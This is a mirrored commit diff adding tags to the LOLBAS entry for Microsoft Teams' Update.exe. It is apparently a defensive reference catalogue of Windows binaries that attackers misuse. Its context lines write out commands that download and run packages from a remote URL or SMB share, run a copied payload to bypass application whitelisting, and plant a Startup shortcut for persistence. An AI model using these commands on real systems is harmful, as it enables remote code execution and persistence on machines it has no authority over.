mirror of
https://github.com/LOLBAS-Project/LOLBAS
synced 2024-12-30 16:54:00 +01:00
Update Update.yml Tags
Added Tags: Execute Nuget Execute Remote Execute EXE
This commit is contained in:
parent
ce9d4e59f5
commit
927189f01e
@ -18,6 +18,9 @@ Commands:
|
|||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1218
|
MitreID: T1218
|
||||||
OperatingSystem: Windows 7 and up with Microsoft Teams installed
|
OperatingSystem: Windows 7 and up with Microsoft Teams installed
|
||||||
|
Tags:
|
||||||
|
- Execute: Nuget
|
||||||
|
- Execute: Remote
|
||||||
- Command: Update.exe --update=[url to package]
|
- Command: Update.exe --update=[url to package]
|
||||||
Description: The above binary will go to url and look for RELEASES file, download and install the nuget package.
|
Description: The above binary will go to url and look for RELEASES file, download and install the nuget package.
|
||||||
Usecase: Download and execute binary
|
Usecase: Download and execute binary
|
||||||
@ -25,6 +28,9 @@ Commands:
|
|||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1218
|
MitreID: T1218
|
||||||
OperatingSystem: Windows 7 and up with Microsoft Teams installed
|
OperatingSystem: Windows 7 and up with Microsoft Teams installed
|
||||||
|
Tags:
|
||||||
|
- Execute: Nuget
|
||||||
|
- Execute: Remote
|
||||||
- Command: Update.exe --update=\\remoteserver\payloadFolder
|
- Command: Update.exe --update=\\remoteserver\payloadFolder
|
||||||
Description: The above binary will go to url and look for RELEASES file, download and install the nuget package via SAMBA.
|
Description: The above binary will go to url and look for RELEASES file, download and install the nuget package via SAMBA.
|
||||||
Usecase: Download and execute binary
|
Usecase: Download and execute binary
|
||||||
@ -32,6 +38,9 @@ Commands:
|
|||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1218
|
MitreID: T1218
|
||||||
OperatingSystem: Windows 7 and up with Microsoft Teams installed
|
OperatingSystem: Windows 7 and up with Microsoft Teams installed
|
||||||
|
Tags:
|
||||||
|
- Execute: Nuget
|
||||||
|
- Execute: Remote
|
||||||
- Command: Update.exe --update=\\remoteserver\payloadFolder
|
- Command: Update.exe --update=\\remoteserver\payloadFolder
|
||||||
Description: The above binary will go to url and look for RELEASES file, download and install the nuget package via SAMBA.
|
Description: The above binary will go to url and look for RELEASES file, download and install the nuget package via SAMBA.
|
||||||
Usecase: Download and execute binary
|
Usecase: Download and execute binary
|
||||||
@ -39,6 +48,9 @@ Commands:
|
|||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1218
|
MitreID: T1218
|
||||||
OperatingSystem: Windows 7 and up with Microsoft Teams installed
|
OperatingSystem: Windows 7 and up with Microsoft Teams installed
|
||||||
|
Tags:
|
||||||
|
- Execute: Nuget
|
||||||
|
- Execute: Remote
|
||||||
- Command: Update.exe --updateRollback=[url to package]
|
- Command: Update.exe --updateRollback=[url to package]
|
||||||
Description: The above binary will go to url and look for RELEASES file, download and install the nuget package.
|
Description: The above binary will go to url and look for RELEASES file, download and install the nuget package.
|
||||||
Usecase: Download and execute binary
|
Usecase: Download and execute binary
|
||||||
@ -46,6 +58,9 @@ Commands:
|
|||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1218
|
MitreID: T1218
|
||||||
OperatingSystem: Windows 7 and up with Microsoft Teams installed
|
OperatingSystem: Windows 7 and up with Microsoft Teams installed
|
||||||
|
Tags:
|
||||||
|
- Execute: Nuget
|
||||||
|
- Execute: Remote
|
||||||
- Command: Update.exe --updateRollback=[url to package]
|
- Command: Update.exe --updateRollback=[url to package]
|
||||||
Description: The above binary will go to url and look for RELEASES file, download and install the nuget package.
|
Description: The above binary will go to url and look for RELEASES file, download and install the nuget package.
|
||||||
Usecase: Download and execute binary
|
Usecase: Download and execute binary
|
||||||
@ -53,6 +68,9 @@ Commands:
|
|||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1218
|
MitreID: T1218
|
||||||
OperatingSystem: Windows 7 and up with Microsoft Teams installed
|
OperatingSystem: Windows 7 and up with Microsoft Teams installed
|
||||||
|
Tags:
|
||||||
|
- Execute: Nuget
|
||||||
|
- Execute: Remote
|
||||||
- Command: Update.exe --processStart payload.exe --process-start-args "whatever args"
|
- Command: Update.exe --processStart payload.exe --process-start-args "whatever args"
|
||||||
Description: Copy your payload into %userprofile%\AppData\Local\Microsoft\Teams\current\. Then run the command. Update.exe will execute the file you copied.
|
Description: Copy your payload into %userprofile%\AppData\Local\Microsoft\Teams\current\. Then run the command. Update.exe will execute the file you copied.
|
||||||
Usecase: Application Whitelisting Bypass
|
Usecase: Application Whitelisting Bypass
|
||||||
@ -60,6 +78,9 @@ Commands:
|
|||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1218
|
MitreID: T1218
|
||||||
OperatingSystem: Windows 7 and up with Microsoft Teams installed
|
OperatingSystem: Windows 7 and up with Microsoft Teams installed
|
||||||
|
Tags:
|
||||||
|
- Execute: Nuget
|
||||||
|
- Execute: Remote
|
||||||
- Command: Update.exe --updateRollback=\\remoteserver\payloadFolder
|
- Command: Update.exe --updateRollback=\\remoteserver\payloadFolder
|
||||||
Description: The above binary will go to url and look for RELEASES file, download and install the nuget package via SAMBA.
|
Description: The above binary will go to url and look for RELEASES file, download and install the nuget package via SAMBA.
|
||||||
Usecase: Download and execute binary
|
Usecase: Download and execute binary
|
||||||
@ -67,6 +88,9 @@ Commands:
|
|||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1218
|
MitreID: T1218
|
||||||
OperatingSystem: Windows 7 and up with Microsoft Teams installed
|
OperatingSystem: Windows 7 and up with Microsoft Teams installed
|
||||||
|
Tags:
|
||||||
|
- Execute: Nuget
|
||||||
|
- Execute: Remote
|
||||||
- Command: Update.exe --updateRollback=\\remoteserver\payloadFolder
|
- Command: Update.exe --updateRollback=\\remoteserver\payloadFolder
|
||||||
Description: The above binary will go to url and look for RELEASES file, download and install the nuget package via SAMBA.
|
Description: The above binary will go to url and look for RELEASES file, download and install the nuget package via SAMBA.
|
||||||
Usecase: Download and execute binary
|
Usecase: Download and execute binary
|
||||||
@ -74,6 +98,9 @@ Commands:
|
|||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1218
|
MitreID: T1218
|
||||||
OperatingSystem: Windows 7 and up with Microsoft Teams installed
|
OperatingSystem: Windows 7 and up with Microsoft Teams installed
|
||||||
|
Tags:
|
||||||
|
- Execute: Nuget
|
||||||
|
- Execute: Remote
|
||||||
- Command: Update.exe --processStart payload.exe --process-start-args "whatever args"
|
- Command: Update.exe --processStart payload.exe --process-start-args "whatever args"
|
||||||
Description: Copy your payload into %userprofile%\AppData\Local\Microsoft\Teams\current\. Then run the command. Update.exe will execute the file you copied.
|
Description: Copy your payload into %userprofile%\AppData\Local\Microsoft\Teams\current\. Then run the command. Update.exe will execute the file you copied.
|
||||||
Usecase: Execute binary
|
Usecase: Execute binary
|
||||||
@ -81,6 +108,8 @@ Commands:
|
|||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1218
|
MitreID: T1218
|
||||||
OperatingSystem: Windows 7 and up with Microsoft Teams installed
|
OperatingSystem: Windows 7 and up with Microsoft Teams installed
|
||||||
|
Tags:
|
||||||
|
- Execute: EXE
|
||||||
- Command: Update.exe --createShortcut=payload.exe -l=Startup
|
- Command: Update.exe --createShortcut=payload.exe -l=Startup
|
||||||
Description: Copy your payload into "%localappdata%\Microsoft\Teams\current\". Then run the command. Update.exe will create a payload.exe shortcut in "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup". Then payload will run on every login of the user who runs it.
|
Description: Copy your payload into "%localappdata%\Microsoft\Teams\current\". Then run the command. Update.exe will create a payload.exe shortcut in "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup". Then payload will run on every login of the user who runs it.
|
||||||
Usecase: Execute binary
|
Usecase: Execute binary
|
||||||
@ -88,6 +117,8 @@ Commands:
|
|||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1547
|
MitreID: T1547
|
||||||
OperatingSystem: Windows 7 and up with Microsoft Teams installed
|
OperatingSystem: Windows 7 and up with Microsoft Teams installed
|
||||||
|
Tags:
|
||||||
|
- Execute: EXE
|
||||||
- Command: Update.exe --removeShortcut=payload.exe -l=Startup
|
- Command: Update.exe --removeShortcut=payload.exe -l=Startup
|
||||||
Description: Run the command to remove the shortcut created in the "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup" directory you created with the LolBinExecution "--createShortcut" described on this page.
|
Description: Run the command to remove the shortcut created in the "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup" directory you created with the LolBinExecution "--createShortcut" described on this page.
|
||||||
Usecase: Execute binary
|
Usecase: Execute binary
|
||||||
@ -95,6 +126,8 @@ Commands:
|
|||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1070
|
MitreID: T1070
|
||||||
OperatingSystem: Windows 7 and up with Microsoft Teams installed
|
OperatingSystem: Windows 7 and up with Microsoft Teams installed
|
||||||
|
Tags:
|
||||||
|
- Execute: EXE
|
||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: 'C:\Users\<username>\AppData\Local\Microsoft\Teams\update.exe'
|
- Path: 'C:\Users\<username>\AppData\Local\Microsoft\Teams\update.exe'
|
||||||
Code_Sample:
|
Code_Sample:
|
||||||
|
Loading…
Reference in New Issue
Block a user